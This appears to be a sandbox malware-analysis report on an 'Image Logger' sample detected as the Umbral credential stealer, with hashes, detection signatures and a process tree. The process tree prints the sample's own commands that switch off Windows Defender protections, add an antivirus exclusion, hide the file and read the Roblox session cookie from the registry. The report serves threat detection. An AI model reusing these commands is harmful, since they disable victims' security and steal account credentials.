Overview
overview
10Static
static
10Image Logg...up.bat
windows7-x64
10Image Logg...up.bat
windows10-2004-x64
10Image Logg...px.exe
windows7-x64
10Image Logg...px.exe
windows10-2004-x64
10Image Logg...in.exe
windows7-x64
7Image Logg...in.exe
windows10-2004-x64
7main.pyc
windows7-x64
3main.pyc
windows10-2004-x64
3Image Logg...rt.bat
windows7-x64
10Image Logg...rt.bat
windows10-2004-x64
10Analysis
-
max time kernel
120s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
11-09-2024 20:28
Behavioral task
behavioral1
Sample
Image Logger/Setup.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Image Logger/Setup.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Image Logger/Src/Files/upx.exe
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
Image Logger/Src/Files/upx.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Image Logger/Src/main.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
Image Logger/Src/main.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
main.pyc
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
main.pyc
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Image Logger/Start.bat
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Image Logger/Start.bat
Resource
win10v2004-20240802-en
General
-
Target
Image Logger/Src/Files/upx.exe
-
Size
229KB
-
MD5
3191f1be1378fe37eb86efe885252351
-
SHA1
e242bc1a4a1b09dc0936a966153449a7afd227ff
-
SHA256
d5e77c60ebc90e48aa63369619fb8a048867aa1820c119371fb89d3b707324fc
-
SHA512
f2e9f3bbc4456034a0d233f0aca93de4fd5177e028d8f3208248457bc061574ac1a3615e565ca9d54cf41f68df6ac6f03b44c0dbaae0f56cc569440f67af204a
-
SSDEEP
6144:FloZM+rIkd8g+EtXHkv/iD4o+7Cw7ByallgRj++74T7b8e1mA9i:HoZtL+EP8V7Cw7ByallgRj++74DVU
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral3/memory/2212-1-0x0000000001110000-0x0000000001150000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2752 powershell.exe 2344 powershell.exe 2720 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts upx.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2212 upx.exe 2752 powershell.exe 2344 powershell.exe 2720 powershell.exe 1852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 2212 upx.exe Token: SeIncreaseQuotaPrivilege 2644 wmic.exe Token: SeSecurityPrivilege 2644 wmic.exe Token: SeTakeOwnershipPrivilege 2644 wmic.exe Token: SeLoadDriverPrivilege 2644 wmic.exe Token: SeSystemProfilePrivilege 2644 wmic.exe Token: SeSystemtimePrivilege 2644 wmic.exe Token: SeProfSingleProcessPrivilege 2644 wmic.exe Token: SeIncBasePriorityPrivilege 2644 wmic.exe Token: SeCreatePagefilePrivilege 2644 wmic.exe Token: SeBackupPrivilege 2644 wmic.exe Token: SeRestorePrivilege 2644 wmic.exe Token: SeShutdownPrivilege 2644 wmic.exe Token: SeDebugPrivilege 2644 wmic.exe Token: SeSystemEnvironmentPrivilege 2644 wmic.exe Token: SeRemoteShutdownPrivilege 2644 wmic.exe Token: SeUndockPrivilege 2644 wmic.exe Token: SeManageVolumePrivilege 2644 wmic.exe Token: 33 2644 wmic.exe Token: 34 2644 wmic.exe Token: 35 2644 wmic.exe Token: SeIncreaseQuotaPrivilege 2644 wmic.exe Token: SeSecurityPrivilege 2644 wmic.exe Token: SeTakeOwnershipPrivilege 2644 wmic.exe Token: SeLoadDriverPrivilege 2644 wmic.exe Token: SeSystemProfilePrivilege 2644 wmic.exe Token: SeSystemtimePrivilege 2644 wmic.exe Token: SeProfSingleProcessPrivilege 2644 wmic.exe Token: SeIncBasePriorityPrivilege 2644 wmic.exe Token: SeCreatePagefilePrivilege 2644 wmic.exe Token: SeBackupPrivilege 2644 wmic.exe Token: SeRestorePrivilege 2644 wmic.exe Token: SeShutdownPrivilege 2644 wmic.exe Token: SeDebugPrivilege 2644 wmic.exe Token: SeSystemEnvironmentPrivilege 2644 wmic.exe Token: SeRemoteShutdownPrivilege 2644 wmic.exe Token: SeUndockPrivilege 2644 wmic.exe Token: SeManageVolumePrivilege 2644 wmic.exe Token: 33 2644 wmic.exe Token: 34 2644 wmic.exe Token: 35 2644 wmic.exe Token: SeDebugPrivilege 2752 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2212 wrote to memory of 2644 2212 upx.exe 30 PID 2212 wrote to memory of 2644 2212 upx.exe 30 PID 2212 wrote to memory of 2644 2212 upx.exe 30 PID 2212 wrote to memory of 2456 2212 upx.exe 33 PID 2212 wrote to memory of 2456 2212 upx.exe 33 PID 2212 wrote to memory of 2456 2212 upx.exe 33 PID 2212 wrote to memory of 2752 2212 upx.exe 35 PID 2212 wrote to memory of 2752 2212 upx.exe 35 PID 2212 wrote to memory of 2752 2212 upx.exe 35 PID 2212 wrote to memory of 2344 2212 upx.exe 37 PID 2212 wrote to memory of 2344 2212 upx.exe 37 PID 2212 wrote to memory of 2344 2212 upx.exe 37 PID 2212 wrote to memory of 2720 2212 upx.exe 39 PID 2212 wrote to memory of 2720 2212 upx.exe 39 PID 2212 wrote to memory of 2720 2212 upx.exe 39 PID 2212 wrote to memory of 1852 2212 upx.exe 41 PID 2212 wrote to memory of 1852 2212 upx.exe 41 PID 2212 wrote to memory of 1852 2212 upx.exe 41 PID 2212 wrote to memory of 1684 2212 upx.exe 43 PID 2212 wrote to memory of 1684 2212 upx.exe 43 PID 2212 wrote to memory of 1684 2212 upx.exe 43 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2456 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe"C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe"2⤵
- Views/modifies file attributes
PID:2456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2212 -s 19042⤵PID:1684
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c45a788123dc87e2665e95051000a7df
SHA12b3145a15fc213e6a14001e57dabd88eae6ebf4c
SHA2560e4f9433c8b7b8a885e4aa5b29f99b51b7487a87fdac56179d17afd50b37adb1
SHA512ed1363136d821bb19fbab541903b6fae399267d258df35c0f414e27c06410beacd64afd3549b4f063745900c5825fa97a90536db6d14dabb8d4163ed75cc58a2